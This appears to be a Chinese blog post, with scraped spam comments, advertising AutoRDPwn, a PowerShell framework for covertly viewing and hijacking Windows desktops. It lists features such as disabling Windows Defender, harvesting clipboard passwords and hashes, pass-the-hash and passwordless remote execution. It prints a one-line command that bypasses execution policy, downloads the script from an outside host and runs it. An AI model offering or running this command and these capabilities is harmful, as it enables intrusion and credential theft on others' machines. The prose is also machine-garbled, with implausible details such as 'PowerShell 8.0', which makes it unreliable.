一款功能强大的隐蔽型渗透框架
今日给大伙儿详细介绍的是这款全名是AutoRDPwn的隐蔽型渗入架构,事实上AutoRDPwn是1个PowerShell脚本制作,它能够建立对Windows机器设备的自动化技术进攻。这一系统漏洞容许远程控制网络攻击在客户绝不知情人的状况下查询客户的桌面上,以至于可以根据故意post请求来建立桌面上的远程操作。
自然环境规定
PowerShell4.1或更高版本号。
最新版本v 4.5提升的作用
适配PowerShell 8.0
全自动拷贝剪切板中的內容(登陆密码、哈希等)
全自动屏蔽掉Windows Defender(选用了几种不一样的方式)
不用登陆密码只能运用PSexec、WMI和Invoke-Command建立远程控制代码执行
增加攻击方式:DCOM无登陆密码实行
增加进攻控制模块:远程访问/Metasploit web传输
增加进攻控制模块:远程控制VNC网络服务器(对于遗留下自然环境)
全自动填写信息主机名、账户密码域
可应用-noadmin主要参数在沒有管理员权限的状况下运作进攻控制模块
专用工具应用
这个手机应用程序能够立即在当地应用,还可以远程控制应用,或是是在两部机器设备间应用。在导入了附加程序模块以后,该专用工具以至于可以导出来哈希或登陆密码,获得远程控制Shell,发送或免费下载文档,以至于是破译wifi网络的登陆密码及其修复RDP联接历史纪录等等等等。
每行指令只能实行
powershell -ep bypass "Cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfileAutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
人们能够在程序流程的主莱单中查询和挑选必须应用或载入的进攻控制模块:
[1] –PsExec
[2] –Pass the Hash
[3] –Windows Management Instrumentation
[4] –Schedule Task / PSSession
[5] –Windows Remote Assistance
专用工具的详尽应用文本文档:【传送门】
专用工具截屏
新项目详细地址
AutoRDPwn:【GitHub传送门】
相关文章
- 5条评论
- 蓝殇喜余2022-05-27 23:39:15
- l -ep bypass "Cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfileAutoRDPwn.ps1 ; .\AutoRDPw
- 冢渊花桑2022-05-27 17:40:05
- 动屏蔽掉Windows Defender(选用了几种不一样的方式) 不用登陆密码只能运用PSexec、WMI和Invoke-Command建立远程控制代码执行
- 鸠骨桃靥2022-05-27 23:24:00
- .0 全自动拷贝剪切板中的內容(登陆密码、哈希等) 全自动屏蔽掉Windows Defender(选用了几种不一样的方式) 不用登陆密码只能运用PSexec、WMI和Invoke-Command建立远
- 森槿空名2022-05-27 18:53:59
- 5] –Windows Remote Assistance 专用工具的详尽应用文本文档:【传送门】 专用工具截屏 新项目详细地址 AutoRDPwn:【GitHub传送门】
- 惑心野慌2022-05-27 20:24:11
- 本文档:【传送门】 专用工具截屏 新项目详细地址 AutoRDPwn:【GitHub传送门】